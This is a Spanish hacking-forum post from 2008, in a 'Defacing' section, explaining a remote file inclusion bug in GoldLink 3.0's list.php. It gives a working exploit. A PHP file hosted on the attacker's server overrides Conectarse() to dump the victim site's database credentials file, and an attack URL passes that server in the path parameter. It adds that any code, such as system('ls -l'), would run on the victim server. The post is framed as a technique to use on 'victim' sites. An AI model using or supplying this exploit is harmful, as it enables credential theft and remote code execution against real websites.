hackcrack24
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.


Nueva pagina hackcrack24: www.hackcrack24.com.ar
 
ÍndiceÍndice  PortalPortal  Últimas imágenesÚltimas imágenes  BuscarBuscar  RegistrarseRegistrarse  ConectarseConectarse  

hackcrack24 :: Informatica :: Defacing
 

 Bug GoldLink

Ir abajo 
AutorMensaje
hacker-24
Admintrador



Cantidad de envíos : 45
Fecha de inscripción : 12/05/2008

Bug GoldLink Empty
MensajeTema: Bug GoldLink   Bug GoldLink EmptySáb Jul 26, 2008 2:46 am
Bug GoldLink

* www.digital-system.org - csuser.x[at]gmail[dot]com

########################################################################################


Bug GoldLink


Esta técnica funciona en los sitios con intercambio de banners.

Existe un bug en el fichero list.php que viene con el GoldLink 3.0.
Dicho fichero esta programado para ser \'llamado\' desde la pagina que programa el
Webmaster mediante un include().

Para ser exactos y sacado del Leame.txt:
Al comienzo de su página (antes de) debe agregar las siguientes líneas:

**********************************************************

#?php
$path=\"/path/al/script/goldlink\"; // Sin barra al final
include(\"goldlink/list.php\");
?#

**********************************************************

Cambien # por < y >

Con lo cual se supone que la variable path ya esta definida. Ahora veamos las
primeras líneas del list.php:

*****************************************

include(\"$path/variables.php\&qquot;);
$link=Conectarse();

*****************************************

Si llamamos al list.php directamente le podemos meter en la variable path lo que queramos.

Aquí una demostración:

Nos vamos a cualquier servidor que no soporte PHP y creamos el fichero variables.php
con el siguiente contenido:

**********************************

#?
function Conectarse()
{
$fp=fopen(\"variables.php\",r);
fpassthru($fp);
die();
}
?#

**********************************

Después vamos a nuestro navegador y tecleamos:

***************************************************************************

http://www.victima.com/goldlink/list.php?path=http://www.nuestroserver.com

***************************************************************************

Le damos enter, ponemos ver código fuente y tenemos el fichero en cuestión con las
claves de la base de datos.

En vez de eso podríamos haber hecho otra cosa, como system(\"ls -l\"), leer otro
fichero, etc.

Solo hay que meter el código que queramos en la función Conectarse() de nuestro server,
y se ejecutará en el server de la victima con privilegios de http.
Volver arriba Ir abajo
https://hackcrack24.activo.mx
 
Bug GoldLink
Volver arriba 
Página 1 de 1.

Permisos de este foro:No puedes responder a temas en este foro.
hackcrack24 :: Informatica :: Defacing-
Cambiar a: